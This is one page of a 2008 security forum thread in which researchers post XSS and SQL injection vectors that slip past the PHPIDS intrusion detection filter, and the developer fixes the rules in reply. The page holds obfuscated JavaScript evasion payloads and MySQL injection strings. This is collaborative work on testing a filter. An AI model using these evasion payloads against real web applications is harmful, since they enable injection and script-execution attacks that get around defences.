Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920...LastNext
Current Page: 15 of 31
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 10, 2008 08:00PM

I wanted to see how phpids handled some recent stuff from milw0rm, so for fun:
RCE
http://milw0rm.com/exploits/4851 Caught,score: 19
http://milw0rm.com/exploits/4849 Not caught.
vector:
?test=@phpinfo();@

LFI
http://milw0rm.com/exploits/4876 Caught,score: 15

SQLi
http://milw0rm.com/exploits/4867 Caught,score: 32
http://milw0rm.com/exploits/4863 Caught,score: 14

4 out of 5, not bad:)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 11, 2008 05:00AM

Hi!

Wow - very nice find - the problem with the not-detected vector actually turned out to be a severe bug in the converter. Thanks!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 11, 2008 07:51AM

actually not that new but since I posted some (My)SQLi vectors with a column name required you can of course do some math with a column name only:

aa'or column=column -- #aa (php-ids)
aa'or column*column!='0 (php-ids)
aa'or column like column -- #a (php-ids)

0'*column is \N - '1 (php-ids)
1'*column is \N or '1 (php-ids)
1'*@a is \N - ' (php-ids)
1'*@a is \N or '1 (php-ids)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 12, 2008 11:11AM

I haven't XSS'd PHPIDS for a while so I thought I'd have a go.....

x=[/&/,alert,/&/][1],x(1)

:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 11:30AM

Nice one Gareth! Here's a modified version that works in IE7 and Opera, but didn't work in Firefox 3 beta or Safari...
[demo.phpids.org]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: thornmaker
Date: January 12, 2008 12:23PM

Another modification of Gareth's, now with arbitrary code execution goodness: [p42.us]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Gareth Heyes
Date: January 12, 2008 12:29PM

Hehe cool thornmaker

Here's another:-

new RegExp(/a/,alert(1))
RegExp(/a/,alert(1))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/12/2008 12:41PM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Gareth Heyes
Date: January 12, 2008 12:44PM

javascript:"<iframe src='http://demo.php-ids.org/?test=RegExp(/a/,alert(name))' name='Follow the rabbit!'>"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Anonymous User
Date: January 12, 2008 01:15PM

Indeed - it's been a while ;)

Thx Reiners, David and Gareth! The RegExp issue pointed on a converter bug and I customized the rules for the other ones. I think we can release 0.4.5 the next days - any thoughts?

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 02:25PM

a couple variations using null to bypass some filters:

http://p42.us/phpids/38.html
y='nam'
$x=eval,null
$x($x(y+'e')+/x/)
http://p42.us/phpids/39.html
y=name,null
$x=eval,null
$x(y)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 12, 2008 02:32PM

just a little bug in the rules when using "is \N" without space.

0'*column is\N - '1 (php-ids)
1'*column is\N or '1 (php-ids)
1'*@a is\N - ' (php-ids)
1'*@a is\N or '1 (php-ids)

another modification:
1'*@a is \N-' (php-ids)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 12, 2008 04:56PM

found and fixed - thx!

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 05:02PM

and another: http://p42.us/phpids/40.html
y='na'
$x=3.e1[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 12, 2008 05:30PM

Long time no hailstorm like this - damn exponential numbers, they messed with all XSS rules using \d :) fixed!

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 12, 2008 05:36PM

Just noted that I actually dont need the "is \N" issue neccessarily, sry ;)
1'*@a or'1 (php-ids)
1'*column or'1 (php-ids)

and this vector works as well but you have to make sure that the column contains integers (which isnt hard to find since most tables has a column like "id" or something similar):
1'*id-'0 (php-ids)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 12, 2008 06:00PM

@.mario: my last one still works... you sure it's fixed?

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 12, 2008 06:34PM

Ah damn - I accidentally didn't deploy the latest converter revision. Done!

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 12, 2008 07:03PM

I'm pretty sure this didn't work before (the 1. part... lots of variations also work like .1, -1, etc). Maybe moving the ternary operator into the argument changes which filters it's brushing up against: http://p42.us/phpids/41.html
y='na'
$x=(1.)[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)



Edited 1 time(s). Last edit at 01/12/2008 07:05PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 06:56AM

delete alert(1)
AND
typeof alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/13/2008 07:00AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 07:50AM

This is a variant on delete but I thought it looked cool so I've added it here :)

delete this[
decodeURI
(
'a%6Cert'
)
]
(1)

I wanted a way to directly call the alert without eval. This holds the reference to the current window and so using this['alert'] refers property alert in the window.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/13/2008 07:52AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 08:19AM

I'm throwing things at it now :D

throw alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 13, 2008 08:51AM

*Ouch*

I added some fixes and I am pretty sure that it will be pretty hard to find new stuff right now - especially when coming to ternaries and concatenations. (But I am sure there's still potential for a surprise *g*)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 09:21AM

Hehe we'll see ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Date: January 13, 2008 11:00AM

@.mario: ternary is my middle name - [p42.us]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 11:46AM

@Master Ternary Li

Hehe I know :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 01:52PM

1 instanceof alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 13, 2008 02:12PM

1 in alert(1)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:18PM

Ah bloody hell - the instanceof I did expect but the in I didn't. Nice!

And btw even that one works:
1in alert(1)

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:24PM

@mario

It might be interesting to collect all the JS functions and objects and run a simple script to determine javascript execution. I've done something similar with variables:-

http://www.businessinfo.co.uk/labs/js_variables/js_variable_tester.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:25PM

Yep - I saw that. I can't stop thinking about a way to sandbox JS execution recently. Seems to be the only way (ma1's words...)

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920...LastNext
Current Page: 15 of 31


Sorry, only registered users may post in this forum.